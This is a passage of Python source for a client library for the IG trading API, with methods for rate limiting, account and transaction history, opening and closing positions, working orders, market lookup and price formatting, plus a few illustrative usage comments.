def _token_bucket_trading(self, ):
while self._bucket_threads_run:
time.sleep(60.0/self._trading_requests_per_minute)
self._trading_requests_queue.put(True, block=True)
return
def _token_bucket_non_trading(self, ):
while self._bucket_threads_run:
time.sleep(60.0/self._non_trading_requests_per_minute)
self._non_trading_requests_queue.put(True, block=True)
return
def trading_rate_limit_pause_or_pass(self, ):
if self._use_rate_limiter:
self._trading_requests_queue.get(block=True)
self._trading_times.append(time.time())
self._trading_times = [req_time for req_time in self._trading_times if req_time > time.time()-60]
logging.info(f'Number of trading requests in last 60 seconds = '
f'{len(self._trading_times)} of {self._trading_requests_per_minute}')
return
def non_trading_rate_limit_pause_or_pass(self, ):
if self._use_rate_limiter:
self._non_trading_requests_queue.get(block=True)
self._non_trading_times.append(time.time())
self._non_trading_times = [req_time for req_time in self._non_trading_times if req_time > time.time()-60]
logging.info(f'Number of non-trading requests in last 60 seconds = '
f'{len(self._non_trading_times)} of {self._non_trading_requests_per_minute}')
return
def _exit_bucket_threads(self,):
if self._use_rate_limiter:
if self._bucket_threads_run:
self._bucket_threads_run = False
try:
self._trading_requests_queue.get(block=False)
except Empty:
pass
try:
self._non_trading_requests_queue.get(block=False)
except Empty:
pass
return
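# Illustrative sketch (assumption): the rate limiter above is a "leaky token bucket" --
# a filler thread drops one token into a bounded Queue every 60/requests_per_minute
# seconds, and each request blocks on Queue.get() until a token is available. A
# stripped-down, stand-alone version of the same idea:
#
#   import time
#   from queue import Queue
#   from threading import Thread
#
#   def make_bucket(requests_per_minute, burst=1):
#       bucket = Queue(burst)
#       for _ in range(burst):            # pre-fill so the first call(s) can burst
#           bucket.put(True)
#       def filler():
#           while True:
#               time.sleep(60.0 / requests_per_minute)
#               bucket.put(True, block=True)
#       Thread(target=filler, daemon=True).start()
#       return bucket
#
#   bucket = make_bucket(30)
#   bucket.get(block=True)                # pauses until a token is available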
def _get_session(self, session):
"""Returns a Requests session (from self.session) if session is None
or session if it's not None (cached session with requests-cache
for example)
"""
if session is None:
session = self.session # requests Session
else:
assert isinstance(
session, Session
), "session must be <requests.session.Session object> not %s" % type(
session
)
session = session
return session
def _req(self, action, endpoint, params, session, version='1', check=True):
"""
Wraps the _request() function, applying a tenacity.Retrying object if configured
"""
if self._retryer is not None:
result = self._retryer.__call__(self._request, action, endpoint, params, session, version, check)
else:
result = self._request(action, endpoint, params, session, version, check)
return result
def _request(self, action, endpoint, params, session, version='1', check=True):
"""Creates a CRUD request and returns response"""
session = self._get_session(session)
if check:
self._check_session()
response = self.crud_session.req(action, endpoint, params, session, version)
if response.status_code >= 500:
raise (IGException(f"Server problem: status code: {response.status_code}, reason: {response.reason}"))
response.encoding = 'utf-8'
if self._api_limit_hit(response.text):
raise ApiExceededException()
return response
@staticmethod
def _api_limit_hit(response_text):
# note we don't check for historical data allowance - it only gets reset once a week
return 'exceeded-api-key-allowance' in response_text or \
'exceeded-account-allowance' in response_text or \
'exceeded-account-trading-allowance' in response_text
# ---------- PARSE_RESPONSE ----------- #
@staticmethod
def parse_response(*args, **kwargs):
"""Parses JSON response
returns dict
exception raised when error occurs"""
response = json.loads(*args, **kwargs)
if "errorCode" in response:
raise (Exception(response["errorCode"]))
return response
# --------- END -------- #
# ------ DATAFRAME TOOLS -------- #
@staticmethod
def colname_unique(d_cols):
"""Returns a set of column names (unique)"""
s = set()
for _, lst in d_cols.items():
for colname in lst:
s.add(colname)
return s
@staticmethod
def expand_columns(data, d_cols, flag_col_prefix=False, col_overlap_allowed=None):
"""Expand columns"""
if col_overlap_allowed is None:
col_overlap_allowed = []
for (col_lev1, lst_col) in d_cols.items():
ser = data[col_lev1]
del data[col_lev1]
for col in lst_col:
if col not in data.columns or col in col_overlap_allowed:
if flag_col_prefix:
colname = col_lev1 + "_" + col
else:
colname = col
data[colname] = ser.map(lambda x: x[col], na_action='ignore')
else:
raise (NotImplementedError("col overlap: %r" % col))
return data
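# Illustrative sketch (assumption): expand_columns() flattens a column of nested dicts
# into one column per key, e.g. a 'balance' column holding {"available": ..., "deposit": ...}
# becomes separate 'available' and 'deposit' columns (or 'balance_available' etc. when
# flag_col_prefix=True):
#
#   import pandas as pd
#
#   df = pd.DataFrame({"accountId": ["A1"],
#                      "balance": [{"available": 100.0, "deposit": 250.0}]})
#   flat = IGService.expand_columns(df, {"balance": ["available", "deposit"]})
#   # flat columns: accountId, available, deposit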
# -------- END ------- #
# -------- ACCOUNT ------- #
def fetch_accounts(self, session=None):
"""Returns a list of accounts belonging to the logged-in client"""
self.non_trading_rate_limit_pause_or_pass()
version = "1"
params = {}
endpoint = "/accounts"
action = "read"
response = self._req(action, endpoint, params, session, version)
data = self.parse_response(response.text)
if self.return_dataframe:
data = pd.DataFrame(data["accounts"])
d_cols = {"balance": [u"available", u"balance", u"deposit", u"profitLoss"]}
data = self.expand_columns(data, d_cols, False)
if len(data) == 0:
columns = [
"accountAlias",
"accountId",
"accountName",
"accountType",
"balance",
"available",
"balance",
"deposit",
"profitLoss",
"canTransferFrom",
"canTransferTo",
"currency",
"preferred",
"status",
]
data = pd.DataFrame(columns=columns)
return data
return data
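# Illustrative usage sketch (username, password and API key below are placeholders):
# a typical flow is to construct the service, open a session, then call the account
# endpoints, which return pandas DataFrames when return_dataframe is enabled.
#
#   ig = IGService("my_username", "my_password", "my_api_key", acc_type="demo")
#   ig.create_session()
#   accounts = ig.fetch_accounts()
#   print(accounts[["accountId", "balance", "available"]])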
def fetch_account_preferences(self, session=None):
"""
Gets the preferences for the logged in account
:param session: session object. Optional
:type session: requests.Session
:return: preference values
:rtype: dict
"""
self.non_trading_rate_limit_pause_or_pass()
version = "1"
params = {}
endpoint = "/accounts/preferences"
action = "read"
response = self._req(action, endpoint, params, session, version)
prefs = self.parse_response(response.text)
return prefs
def update_account_preferences(self, trailing_stops_enabled=False, session=None):
"""
Updates the account preferences. Currently only one value supported - trailing stops
:param trailing_stops_enabled: whether trailing stops should be enabled for the account
:type trailing_stops_enabled: bool
:param session: session object. Optional
:type session: requests.Session
:return: status of the update request
:rtype: str
"""
self.non_trading_rate_limit_pause_or_pass()
version = "1"
params = {}
endpoint = "/accounts/preferences"
action = "update"
params['trailingStopsEnabled'] = 'true' if trailing_stops_enabled else 'false'
response = self._req(action, endpoint, params, session, version)
update_status = self.parse_response(response.text)
return update_status['status']
def fetch_account_activity_by_period(self, milliseconds, session=None):
"""
Returns the account activity history for the last specified period
"""
self.non_trading_rate_limit_pause_or_pass()
version = "1"
milliseconds = conv_to_ms(milliseconds)
params = {}
url_params = {"milliseconds": milliseconds}
endpoint = "/history/activity/{milliseconds}".format(**url_params)
action = "read"
response = self._req(action, endpoint, params, session, version)
data = self.parse_response(response.text)
if self.return_dataframe:
data = pd.DataFrame(data["activities"])
if len(data) == 0:
columns = [
"actionStatus", "activity", "activityHistoryId", "channel", "currency", "date",
"dealId", "epic", "level", "limit", "marketName", "period", "result", "size",
"stop", "stopType", "time"
]
data = pd.DataFrame(columns=columns)
return data
return data
def fetch_account_activity_by_date(self, from_date: datetime, to_date: datetime, session=None):
"""
Returns the account activity history for period between the specified dates
"""
self.non_trading_rate_limit_pause_or_pass()
version = "1"
if from_date is None or to_date is None:
raise IGException("Both from_date and to_date must be specified")
if from_date > to_date:
raise IGException("from_date must be before to_date")
params = {}
url_params = {
"fromDate": from_date.strftime('%d-%m-%Y'),
"toDate": to_date.strftime('%d-%m-%Y')
}
endpoint = "/history/activity/{fromDate}/{toDate}".format(**url_params)
action = "read"
response = self._req(action, endpoint, params, session, version)
data = self.parse_response(response.text)
if _HAS_PANDAS and self.return_dataframe:
data = pd.DataFrame(data["activities"])
if len(data) == 0:
columns = [
"actionStatus", "activity", "activityHistoryId", "channel", "currency", "date",
"dealId", "epic", "level", "limit", "marketName", "period", "result", "size",
"stop", "stopType", "time"
]
data = pd.DataFrame(columns=columns)
return data
return data
def fetch_account_activity_v2(
self,
from_date: datetime = None,
to_date: datetime = None,
max_span_seconds: int = None,
page_size: int = 20,
session=None):
"""
Returns the account activity history (v2)
If the result set spans multiple 'pages', this method will automatically get all the results and
bundle them into one object.
:param from_date: start date and time. Optional
:type from_date: datetime
:param to_date: end date and time. A date without time refers to the end of that day. Defaults to
today. Optional
:type to_date: datetime
:param max_span_seconds: Limits the timespan in seconds through to current time (not applicable if a
date range has been specified). Default 600. Optional
:type max_span_seconds: int
:param page_size: number of records per page. Default 20. Optional. Use 0 to turn off paging
:type page_size: int
:param session: session object. Optional
:type session: Session
:return: results set
:rtype: Pandas DataFrame if configured, otherwise a dict
"""
self.non_trading_rate_limit_pause_or_pass()
version = "2"
params = {}
if from_date:
params["from"] = from_date.strftime('%Y-%m-%dT%H:%M:%S')
if to_date:
params["to"] = to_date.strftime('%Y-%m-%dT%H:%M:%S')
if max_span_seconds:
params["maxSpanSeconds"] = max_span_seconds
params["pageSize"] = page_size
endpoint = "/history/activity/"
action = "read"
data = {}
activities = []
pagenumber = 1
more_results = True
while more_results:
params["pageNumber"] = pagenumber
response = self._req(action, endpoint, params, session, version)
data = self.parse_response(response.text)
activities.extend(data["activities"])
page_data = data["metadata"]["pageData"]
if page_data["totalPages"] == 0 or \
(page_data["pageNumber"] == page_data["totalPages"]):
more_results = False
else:
pagenumber += 1
data["activities"] = activities
if _HAS_PANDAS and self.return_dataframe:
data = pd.DataFrame(data["activities"])
return data
def fetch_account_activity(
self,
from_date: datetime = None,
to_date: datetime = None,
detailed=False,
deal_id: str = None,
fiql_filter: str = None,
page_size: int = 50,
session=None):
"""
Returns the account activity history (v3)
If the result set spans multiple 'pages', this method will automatically get all the results and
bundle them into one object.
:param from_date: start date and time. Optional
:type from_date: datetime
:param to_date: end date and time. A date without time refers to the end of that day. Defaults to
today. Optional
:type to_date: datetime
:param detailed: Indicates whether to retrieve additional details about the activity. Default False. Optional
:type detailed: bool
:param deal_id: deal ID. Optional
:type deal_id: str
:param fiql_filter: FIQL filter (supported operators: ==|!=|,|;). Optional
:type fiql_filter: str
:param page_size: page size (min: 10, max: 500). Default 50. Optional
:type page_size: int
:param session: session object. Optional
:type session: Session
:return: results set
:rtype: Pandas DataFrame if configured, otherwise a dict
"""
self.non_trading_rate_limit_pause_or_pass()
version = "3"
params = {}
if from_date:
params["from"] = from_date.strftime('%Y-%m-%dT%H:%M:%S')
if to_date:
params["to"] = to_date.strftime('%Y-%m-%dT%H:%M:%S')
if detailed:
params["detailed"] = "true"
if deal_id:
params["dealId"] = deal_id
if fiql_filter:
params["filter"] = fiql_filter
params["pageSize"] = page_size
endpoint = "/history/activity/"
action = "read"
data = {}
activities = []
more_results = True
while more_results:
response = self._req(action, endpoint, params, session, version)
data = self.parse_response(response.text)
activities.extend(data["activities"])
paging = data["metadata"]["paging"]
if paging["next"] is None:
more_results = False
else:
parse_result = urlparse(paging["next"])
query = parse_qs(parse_result.query)
logging.debug(f"fetch_account_activity() next query: '{query}'")
if 'from' in query:
params["from"] = query["from"][0]
else:
del params["from"]
if 'to' in query:
params["to"] = query["to"][0]
else:
del params["to"]
data["activities"] = activities
if _HAS_PANDAS and self.return_dataframe:
if detailed:
data = self.format_activities(data)
else:
data = pd.DataFrame(data["activities"])
return data
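# Illustrative usage sketch (assumption; `ig` is an authenticated IGService instance and
# the filter value is only an example): v3 activity queries can be narrowed with a date
# window and a FIQL filter, and the method follows metadata['paging']['next'] links
# until the result set is exhausted.
#
#   from datetime import datetime, timedelta
#
#   since = datetime.now() - timedelta(days=7)
#   activity = ig.fetch_account_activity(from_date=since,
#                                        detailed=True,
#                                        fiql_filter="channel==WEB",
#                                        page_size=100)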
@staticmethod
def format_activities(data):
data = pd.json_normalize(data["activities"],
record_path=['details', ['actions']],
meta=['date', 'epic', 'period', 'dealId', 'channel', 'type', 'status', 'description',
['details', 'marketName'],
['details', 'goodTillDate'],
['details', 'currency'],
['details', 'direction'],
['details', 'level'],
['details', 'stopLevel'],
['details', 'stopDistance'],
['details', 'guaranteedStop'],
['details', 'trailingStopDistance'],
['details', 'trailingStep'],
['details', 'limitLevel'],
['details', 'limitDistance']],
)
data = data.rename(columns={'details.marketName': 'marketName',
'details.goodTillDate': 'goodTillDate',
'details.currency': 'currency',
'details.direction': 'direction',
'details.level': 'level',
'details.stopLevel': 'stopLevel',
'details.stopDistance': 'stopDistance',
'details.guaranteedStop': 'guaranteedStop',
'details.trailingStopDistance': 'trailingStopDistance',
'details.trailingStep': 'trailingStep',
'details.limitLevel': 'limitLevel',
'details.limitDistance': 'limitDistance'})
cols = data.columns.tolist()
cols = cols[2:] + cols[:2]
data = data[cols]
return data
def fetch_transaction_history_by_type_and_period(
self, milliseconds, trans_type, session=None
):
"""Returns the transaction history for the specified transaction
type and period"""
self.non_trading_rate_limit_pause_or_pass()
version = "1"
milliseconds = conv_to_ms(milliseconds)
params = {}
url_params = {"milliseconds": milliseconds, "trans_type": trans_type}
endpoint = "/history/transactions/{trans_type}/{milliseconds}".format(
**url_params
)
action = "read"
response = self._req(action, endpoint, params, session, version)
data = self.parse_response(response.text)
if self.return_dataframe:
data = pd.DataFrame(data["transactions"])
if len(data) == 0:
columns = [
"cashTransaction",
"closeLevel",
"currency",
"date",
"instrumentName",
"openLevel",
"period",
"profitAndLoss",
"reference",
"size",
"transactionType",
]
data = pd.DataFrame(columns=columns)
return data
return data
def fetch_transaction_history(
self,
trans_type=None,
from_date=None,
to_date=None,
max_span_seconds=None,
page_size=None,
page_number=None,
session=None,
):
"""Returns the transaction history for the specified transaction
type and period"""
self.non_trading_rate_limit_pause_or_pass()
version = "2"
params = {}
if trans_type:
params["type"] = trans_type
if from_date:
if hasattr(from_date, "isoformat"):
from_date = from_date.isoformat()
params["from"] = from_date
if to_date:
if hasattr(to_date, "isoformat"):
to_date = to_date.isoformat()
params["to"] = to_date
if max_span_seconds:
params["maxSpanSeconds"] = max_span_seconds
if page_size:
params["pageSize"] = page_size
if page_number:
params["pageNumber"] = page_number
endpoint = "/history/transactions"
action = "read"
response = self._req(action, endpoint, params, session, version)
data = self.parse_response(response.text)
if self.return_dataframe:
data = pd.DataFrame(data["transactions"])
if len(data) == 0:
columns = [
"cashTransaction",
"closeLevel",
"currency",
"date",
"dateUtc",
"instrumentName",
"openLevel",
"period",
"profitAndLoss",
"reference",
"size",
"transactionType",
]
data = pd.DataFrame(columns=columns)
return data
return data
# -------- END -------- #
# -------- DEALING -------- #
def fetch_deal_by_deal_reference(self, deal_reference, session=None):
"""Returns a deal confirmation for the given deal reference"""
self.non_trading_rate_limit_pause_or_pass()
version = "1"
params = {}
url_params = {"deal_reference": deal_reference}
endpoint = "/confirms/{deal_reference}".format(**url_params)
action = "read"
for i in range(5):
response = self._req(action, endpoint, params, session, version)
if response.status_code == 404:
logger.info("Deal reference %s not found, retrying." % deal_reference)
time.sleep(1)
else:
break
data = self.parse_response(response.text)
return data
def fetch_open_position_by_deal_id(self, deal_id, session=None):
"""Return the open position by deal id for the active account"""
self.non_trading_rate_limit_pause_or_pass()
version = "2"
params = {}
url_params = {"deal_id": deal_id}
endpoint = "/positions/{deal_id}".format(**url_params)
action = "read"
for i in range(5):
response = self._req(action, endpoint, params, session, version)
if response.status_code == 404:
logger.info("Deal id %s not found, retrying." % deal_id)
time.sleep(1)
else:
break
data = self.parse_response(response.text)
return data
def fetch_open_positions(self, session=None, version='2'):
"""
Returns all open positions for the active account. Supports both v1 and v2
:param session: session object, optional
:type session: Session
:param version: API version, 1 or 2
:type version: str
:return: table of position data, one per row
:rtype: pd.DataFrame
"""
self.non_trading_rate_limit_pause_or_pass()
params = {}
endpoint = "/positions"
action = "read"
response = self._req(action, endpoint, params, session, version)
data = self.parse_response(response.text)
if self.return_dataframe:
lst = data["positions"]
data = pd.DataFrame(lst)
cols = {
"position": [
"contractSize", "createdDate", "createdDateUTC", "dealId", "dealReference", "size", "direction",
"limitLevel", "level", "currency", "controlledRisk", "stopLevel", "trailingStep",
"trailingStopDistance", "limitedRiskPremium"
],
"market": [
"instrumentName", "expiry", "epic", "instrumentType", "lotSize", "high", "low",
"percentageChange", "netChange", "bid", "offer", "updateTime", "updateTimeUTC",
"delayTime", "streamingPricesAvailable", "marketStatus", "scalingFactor"
]
}
if version == '1':
cols['position'].remove('createdDateUTC')
cols['position'].remove('dealReference')
cols['position'].remove('size')
cols['position'].insert(3, 'dealSize')
cols['position'].remove('level')
cols['position'].insert(6, 'openLevel')
cols['market'].remove('updateTimeUTC')
if len(data) == 0:
data = pd.DataFrame(columns=self.colname_unique(cols))
return data
data = self.expand_columns(data, cols)
return data
def close_open_position(
self,
deal_id,
direction,
epic,
expiry,
level,
order_type,
quote_id,
size,
session=None,
):
"""Closes one or more OTC positions"""
self.trading_rate_limit_pause_or_pass()
version = "1"
params = {
"dealId": deal_id,
"direction": direction,
"epic": epic,
"expiry": expiry,
"level": level,
"orderType": order_type,
"quoteId": quote_id,
"size": size,
}
endpoint = "/positions/otc"
action = "delete"
response = self._req(action, endpoint, params, session, version)
if response.status_code == 200:
deal_reference = json.loads(response.text)["dealReference"]
return self.fetch_deal_by_deal_reference(deal_reference)
else:
raise IGException(response.text)
def create_open_position(
self,
currency_code,
direction,
epic,
expiry,
force_open,
guaranteed_stop,
level,
limit_distance,
limit_level,
order_type,
quote_id,
size,
stop_distance,
stop_level,
trailing_stop,
trailing_stop_increment,
session=None,
):
"""Creates an OTC position"""
self.trading_rate_limit_pause_or_pass()
version = "2"
params = {
"currencyCode": currency_code,
"direction": direction,
"epic": epic,
"expiry": expiry,
"forceOpen": force_open,
"guaranteedStop": guaranteed_stop,
"level": level,
"limitDistance": limit_distance,
"limitLevel": limit_level,
"orderType": order_type,
"quoteId": quote_id,
"size": size,
"stopDistance": stop_distance,
"stopLevel": stop_level,
"trailingStop": trailing_stop,
"trailingStopIncrement": trailing_stop_increment,
}
endpoint = "/positions/otc"
action = "create"
response = self._req(action, endpoint, params, session, version)
if response.status_code == 200:
deal_reference = json.loads(response.text)["dealReference"]
return self.fetch_deal_by_deal_reference(deal_reference)
else:
raise IGException(response.text)
def update_open_position(
self,
limit_level,
stop_level,
deal_id,
guaranteed_stop=False,
trailing_stop=False,
trailing_stop_distance=None,
trailing_stop_increment=None,
session=None,
version='2'):
"""Updates an OTC position"""
self.trading_rate_limit_pause_or_pass()
params = {}
if limit_level is not None:
params["limitLevel"] = limit_level
if stop_level is not None:
params["stopLevel"] = stop_level
if guaranteed_stop:
params["guaranteedStop"] = 'true'
if trailing_stop:
params["trailingStop"] = 'true'
if trailing_stop_distance is not None:
params["trailingStopDistance"] = trailing_stop_distance
if trailing_stop_increment is not None:
params["trailingStopIncrement"] = trailing_stop_increment
url_params = {"deal_id": deal_id}
endpoint = "/positions/otc/{deal_id}".format(**url_params)
action = "update"
response = self._req(action, endpoint, params, session, version)
if response.status_code == 200:
deal_reference = json.loads(response.text)["dealReference"]
return self.fetch_deal_by_deal_reference(deal_reference)
else:
raise IGException(response.text)
def fetch_working_orders(self, session=None, version='2'):
"""Returns all open working orders for the active account"""
self.non_trading_rate_limit_pause_or_pass()  # NOTE: unclear whether IG counts this as a trading request
params = {}
endpoint = "/workingorders"
action = "read"
response = self._req(action, endpoint, params, session, version)
data = self.parse_response(response.text)
if self.return_dataframe:
lst = data["workingOrders"]
data = pd.DataFrame(lst)
col_names_v1 = [u"size", u"trailingStopDistance", u"direction", u"level", u"requestType", u"currencyCode",
u"contingentLimit", u"trailingTriggerIncrement", u"dealId", u"contingentStop", u"goodTill",
u"controlledRisk", u"trailingStopIncrement", u"createdDate", u"epic",
u"trailingTriggerDistance", u"dma"]
col_names_v2 = [u"createdDate", u"currencyCode", u"dealId", u"direction", u"dma", u"epic",
u"goodTillDate", u"goodTillDateISO", u"guaranteedStop", u"limitDistance",
u"orderLevel", u"orderSize", u"orderType", u"stopDistance", u"timeInForce"]
d_cols = {
"marketData": [
u"instrumentName",
u"exchangeId",
u"streamingPricesAvailable",
u"offer",
u"low",
u"bid",
u"updateTime",
u"expiry",
u"high",
u"marketStatus",
u"delayTime",
u"lotSize",
u"percentageChange",
u"epic",
u"netChange",
u"instrumentType",
u"scalingFactor",
]
}
if version == '1':
d_cols["workingOrderData"] = col_names_v1
else:
d_cols["workingOrderData"] = col_names_v2
if len(data) == 0:
data = pd.DataFrame(columns=self.colname_unique(d_cols))
return data
col_overlap_allowed = ["epic"]
data = self.expand_columns(data, d_cols, False, col_overlap_allowed)
# d = data.to_dict()
# data = pd.concat(list(map(pd.DataFrame, d.values())),
# keys=list(d.keys())).T
return data
def create_working_order(
self,
currency_code,
direction,
epic,
expiry,
guaranteed_stop,
level,
size,
time_in_force,
order_type,
limit_distance=None,
limit_level=None,
stop_distance=None,
stop_level=None,
good_till_date=None,
deal_reference=None,
force_open=False,
session=None,
):
"""Creates an OTC working order"""
self.trading_rate_limit_pause_or_pass()
version = "2"
if good_till_date is not None and type(good_till_date) is not int:
good_till_date = conv_datetime(good_till_date, version)
params = {
"currencyCode": currency_code,
"direction": direction,
"epic": epic,
"expiry": expiry,
"guaranteedStop": guaranteed_stop,
"level": level,
"size": size,
"timeInForce": time_in_force,
"type": order_type,
}
if limit_distance:
params["limitDistance"] = limit_distance
if limit_level:
params["limitLevel"] = limit_level
if stop_distance:
params["stopDistance"] = stop_distance
if stop_level:
params["stopLevel"] = stop_level
if deal_reference:
params["dealReference"] = deal_reference
if force_open:
params["force_open"] = 'true'
if good_till_date:
params["goodTillDate"] = good_till_date
endpoint = "/workingorders/otc"
action = "create"
response = self._req(action, endpoint, params, session, version)
if response.status_code == 200:
deal_reference = json.loads(response.text)["dealReference"]
return self.fetch_deal_by_deal_reference(deal_reference)
else:
raise IGException(response.text)
def delete_working_order(self, deal_id, session=None):
"""Deletes an OTC working order"""
self.trading_rate_limit_pause_or_pass()
version = "2"
params = {}
url_params = {"deal_id": deal_id}
endpoint = "/workingorders/otc/{deal_id}".format(**url_params)
action = "delete"
response = self._req(action, endpoint, params, session, version)
if response.status_code == 200:
deal_reference = json.loads(response.text)["dealReference"]
return self.fetch_deal_by_deal_reference(deal_reference)
else:
raise IGException(response.text)
def update_working_order(
self,
good_till_date,
level,
limit_distance,
limit_level,
stop_distance,
stop_level,
guaranteed_stop,
time_in_force,
order_type,
deal_id,
session=None,
):
"""Updates an OTC working order"""
self.trading_rate_limit_pause_or_pass()
version = "2"
if good_till_date is not None and type(good_till_date) is not int:
good_till_date = conv_datetime(good_till_date, version)
params = {
"goodTillDate": good_till_date,
"limitDistance": limit_distance,
"level": level,
"limitLevel": limit_level,
"stopDistance": stop_distance,
"stopLevel": stop_level,
"guaranteedStop": guaranteed_stop,
"timeInForce": time_in_force,
"type": order_type,
}
url_params = {"deal_id": deal_id}
endpoint = "/workingorders/otc/{deal_id}".format(**url_params)
action = "update"
response = self._req(action, endpoint, params, session, version)
if response.status_code == 200:
deal_reference = json.loads(response.text)["dealReference"]
return self.fetch_deal_by_deal_reference(deal_reference)
else:
raise IGException(response.text)
# -------- END -------- #
# -------- MARKETS -------- #
def fetch_client_sentiment_by_instrument(self, market_id, session=None):
"""Returns the client sentiment for the given instrument's market"""
self.non_trading_rate_limit_pause_or_pass()
version = "1"
params = {}
if isinstance(market_id, (list,)):
market_ids = ",".join(market_id)
url_params = {"market_ids": market_ids}
endpoint = "/clientsentiment/?marketIds={market_ids}".format(**url_params)
else:
url_params = {"market_id": market_id}
endpoint = "/clientsentiment/{market_id}".format(**url_params)
action = "read"
response = self._req(action, endpoint, params, session, version)
data = self.parse_response(response.text)
if self.return_munch:
data = munchify(data)
return data
def fetch_related_client_sentiment_by_instrument(self, market_id, session=None):
"""Returns a list of related (also traded) client sentiment for
the given instrument's market"""
self.non_trading_rate_limit_pause_or_pass()
version = "1"
params = {}
url_params = {"market_id": market_id}
endpoint = "/clientsentiment/related/{market_id}".format(**url_params)
action = "read"
response = self._req(action, endpoint, params, session, version)
data = self.parse_response(response.text)
if self.return_dataframe:
data = pd.DataFrame(data["clientSentiments"])
return data
def fetch_top_level_navigation_nodes(self, session=None):
"""Returns all top-level nodes (market categories) in the market
navigation hierarchy."""
self.non_trading_rate_limit_pause_or_pass()
version = "1"
params = {}
endpoint = "/marketnavigation"
action = "read"
response = self._req(action, endpoint, params, session, version)
data = self.parse_response(response.text)
if self.return_dataframe:
data["markets"] = pd.DataFrame(data["markets"])
if len(data["markets"]) == 0:
columns = [
"bid",
"delayTime",
"epic",
"expiry",
"high",
"instrumentName",
"instrumentType",
"lotSize",
"low",
"marketStatus",
"netChange",
"offer",
"otcTradeable",
"percentageChange",
"scalingFactor",
"streamingPricesAvailable",
"updateTime",
]
data["markets"] = pd.DataFrame(columns=columns)
data["nodes"] = pd.DataFrame(data["nodes"])
if len(data["nodes"]) == 0:
columns = ["id", "name"]
data["nodes"] = pd.DataFrame(columns=columns)
# if self.return_munch:
# # ToFix: ValueError: The truth value of a DataFrame is ambiguous.
# # Use a.empty, a.bool(), a.item(), a.any() or a.all().
# from .utils import munchify
# data = munchify(data)
return data
def fetch_sub_nodes_by_node(self, node, session=None):
"""Returns all sub-nodes of the given node in the market
navigation hierarchy"""
self.non_trading_rate_limit_pause_or_pass()
version = "1"
params = {}
url_params = {"node": node}
endpoint = "/marketnavigation/{node}".format(**url_params)
action = "read"
response = self._req(action, endpoint, params, session, version)
data = self.parse_response(response.text)
if self.return_dataframe:
data["markets"] = pd.DataFrame(data["markets"])
data["nodes"] = pd.DataFrame(data["nodes"])
return data
def fetch_market_by_epic(self, epic, session=None):
"""Returns the details of the given market"""
self.non_trading_rate_limit_pause_or_pass()
version = "3"
params = {}
url_params = {"epic": epic}
endpoint = "/markets/{epic}".format(**url_params)
action = "read"
response = self._req(action, endpoint, params, session, version)
data = self.parse_response(response.text)
if self.return_munch:
data = munchify(data)
return data
def fetch_markets_by_epics(self, epics, detailed=True, session=None, version='2'):
"""
Returns the details of the given markets
:param epics: comma separated list of epics
:type epics: str
:param detailed: Whether to return detailed info or snapshot data only. Only supported for
version 2. Optional, default True
:type detailed: bool
:param session: session object. Optional, default None
:type session: requests.Session
:param version: IG API method version. Optional, default '2'
:type version: str
:return: list of market details
:rtype: Munch instance if configured, else dict
"""
self.non_trading_rate_limit_pause_or_pass()
params = {"epics": epics}
if version == '2':
params["filter"] = 'ALL' if detailed else 'SNAPSHOT_ONLY'
endpoint = "/markets"
action = "read"
response = self._req(action, endpoint, params, session, version)
data = self.parse_response(response.text)
if self.return_munch:
data = munchify(data['marketDetails'])
else:
data = data['marketDetails']
return data
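# Illustrative usage sketch (epic codes are examples only; `ig` is an authenticated
# IGService instance): epics are passed as one comma-separated string, and with
# version '2' the `detailed` flag switches between full detail and snapshot-only data.
#
#   details = ig.fetch_markets_by_epics("CS.D.EURUSD.MINI.IP,IX.D.FTSE.DAILY.IP",
#                                       detailed=False)
#   # `details` is a list of market-detail dicts (or Munch objects when munch is installed)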
def search_markets(self, search_term, session=None):
"""Returns all markets matching the search term"""
self.non_trading_rate_limit_pause_or_pass()
version = "1"
endpoint = "/markets"
params = {"searchTerm": search_term}
action = "read"
response = self._req(action, endpoint, params, session, version)
data = self.parse_response(response.text)
if self.return_dataframe:
data = pd.DataFrame(data["markets"])
return data
def format_prices(self, prices, version, flag_calc_spread=False):
"""Format prices data as a DataFrame with hierarchical columns"""
if len(prices) == 0:
raise (Exception("Historical price data not found"))
def cols(typ):
return {
"openPrice.%s" % typ: "Open",
"highPrice.%s" % typ: "High",
"lowPrice.%s" % typ: "Low",
"closePrice.%s" % typ: "Close",
"lastTradedVolume": "Volume",
}
last = prices[0]["lastTradedVolume"] or prices[0]["closePrice"]["lastTraded"]
df = json_normalize(prices)
df = df.set_index("snapshotTime")
df.index = pd.to_datetime(df.index, format=DATE_FORMATS[int(version)])
df.index.name = "DateTime"
df_ask = df[
["openPrice.ask", "highPrice.ask", "lowPrice.ask", "closePrice.ask"]
]
df_ask = df_ask.rename(columns=cols("ask"))
df_bid = df[
["openPrice.bid", "highPrice.bid", "lowPrice.bid", "closePrice.bid"]
]
df_bid = df_bid.rename(columns=cols("bid"))
if flag_calc_spread:
df_spread = df_ask - df_bid
if last:
df_last = df[
[
"openPrice.lastTraded",
"highPrice.lastTraded",
"lowPrice.lastTraded",
"closePrice.lastTraded",
"lastTradedVolume",
]
]
df_last = df_last.rename(columns=cols("lastTraded"))
data = [df_bid, df_ask]
keys = ["bid", "ask"]
if flag_calc_spread:
data.append(df_spread)
keys.append("spread")
if last:
data.append(df_last)
keys.append("last")
df2 = pd.concat(data, axis=1, keys=keys)
return df2
def flat_prices(self, prices, version):
"""Format price data as a flat DataFrame, no hierarchy"""
if len(prices) == 0:
raise (Exception("Historical price data not found"))
df = json_normalize(prices)
df = df.set_index("snapshotTimeUTC")
df.index = pd.to_datetime(df.index, format="%Y-%m-%dT%H:%M:%S")
df.index.name = "DateTime"
df = df.drop(columns=['snapshotTime',
'openPrice.lastTraded',
'closePrice.lastTraded',
'highPrice.lastTraded',
'lowPrice.lastTraded'])
df = df.rename(columns={"openPrice.bid": "open.bid",
"openPrice.ask": "open.ask",
"closePrice.bid": "close.bid",
"closePrice.ask": "close.ask",
"highPrice.bid": "high.bid",
"highPrice.ask": "high.ask",
"lowPrice.bid": "low.bid",
"lowPrice.ask": "low.ask",
"lastTradedVolume": "volume"})
return df
def mid_prices(self, prices, version):
"""Format price data as a flat DataFrame, no hierarchy, calculating mid prices"""
if len(prices) == 0:
raise (Exception("Historical price data not found"))
df = json_normalize(prices)
df = df.set_index("snapshotTimeUTC")
df.index = pd.to_datetime(df.index, format="%Y-%m-%dT%H:%M:%S")
df.index.name = "DateTime"
df['Open'] = df[['openPrice.bid', 'openPrice.ask']].mean(axis=1)
df['High'] = df[['highPrice.bid', 'highPrice.ask']].mean(axis=1)
